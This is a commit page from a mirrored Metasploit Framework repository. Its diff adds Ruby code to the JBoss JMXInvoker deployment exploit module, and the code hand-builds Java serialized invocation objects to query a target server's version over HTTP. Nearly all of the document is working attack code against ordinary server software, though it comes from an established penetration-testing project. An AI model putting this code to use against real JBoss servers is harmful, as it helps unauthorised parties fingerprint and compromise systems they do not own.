infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Retrieve version with Rex::Java::Serialization instead of binary streams

bug/bundler_fix
jvazquez-r7 2015-01-22 14:52:19 -06:00
parent 720def9d0a
commit ad276f0d52
1 changed files with 151 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

155
modules/exploits/multi/http/jboss_invoke_deploy.rb
View File

@ -234,10 +234,14 @@ EOT
def send_serialized_request(file_name , replace_params = {})
path = File.join( Msf::Config.data_directory, "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)
data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }
replace_params.each { |key, value| data.gsub!(key, value) }
case file_name
when 'version.bin'
data = build_version.encode
else
path = File.join( Msf::Config.data_directory, "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name)
data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) }
replace_params.each { |key, value| data.gsub!(key, value) }
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
@ -350,4 +354,147 @@ EOT
end
nil
end
def build_version
builder = Rex::Java::Serialization::Builder.new
object_array = builder.new_array(
values_type: 'java.lang.Object;',
values: [
builder.new_object(
name: 'javax.management.ObjectName',
serial: 0xf03a71beb6d15cf,
flags: 3,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
),
Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=Server')
],
name: '[Ljava.lang.Object;',
serial: 0x90ce589f1073296c,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object_array
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'Version')
build_invocation(stream)
end
def build_invocation(stream_argument)
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
null_stream = build_null_stream
null_stream_enc = null_stream.encode
null_stream_value = [null_stream_enc.length].pack('N')
null_stream_value << null_stream_enc
null_stream_value << "\xfb\x57\xa7\xaa"
stream_argument_enc = stream_argument.encode
stream_argument_value = [stream_argument_enc.length].pack('N')
stream_argument_value << stream_argument_enc
stream_argument_value << "\x7b\x87\xa0\xfb"
stream.contents << build_marshalled_invocation
stream.contents << Rex::Java::Serialization::Model::NullReference.new
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x97\x51\x4d\xdd\xd4\x2a\x42\xaf")
stream.contents << build_integer(647347722)
stream.contents << build_marshalled_value
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, stream_argument_value)
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x01")
stream.contents << build_invocation_key(5)
stream.contents << build_marshalled_value
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x02")
stream.contents << build_invocation_key(4)
stream.contents << build_invocation_type(1)
stream.contents << build_invocation_key(10)
stream.contents << Rex::Java::Serialization::Model::NullReference.new
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream
end
def build_marshalled_invocation
builder = Rex::Java::Serialization::Builder.new
builder.new_object(
name: 'org.jboss.invocation.MarshalledInvocation',
serial: 0xf6069527413ea4be,
flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
end
def build_marshalled_value
builder = Rex::Java::Serialization::Builder.new
builder.new_object(
name: 'org.jboss.invocation.MarshalledValue',
serial: 0xeacce0d1f44ad099,
flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
end
def build_invocation_key(ordinal)
builder = Rex::Java::Serialization::Builder.new
builder.new_object(
name: 'org.jboss.invocation.InvocationKey',
serial: 0xb8fb7284d79385f9,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
fields: [
['int', 'ordinal']
],
data:[
['int', ordinal],
]
)
end
def build_invocation_type(ordinal)
builder = Rex::Java::Serialization::Builder.new
builder.new_object(
name: 'org.jboss.invocation.InvocationType',
serial: 0x59a73a1ca52b7cbf,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
fields: [
['int', 'ordinal']
],
data:[
['int', ordinal],
]
)
end
def build_integer(value)
builder = Rex::Java::Serialization::Builder.new
builder.new_object(
name: 'java.lang.Integer',
serial: 0x12e2a0a4f7818738,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
super_class: builder.new_class(
name: 'java.lang.Number',
serial: 0x86ac951d0b94e08b,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
),
fields: [
['int', 'value']
],
data:[
['int', value],
]
)
end
def build_null_stream
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = [Rex::Java::Serialization::Model::NullReference.new]
stream
end
end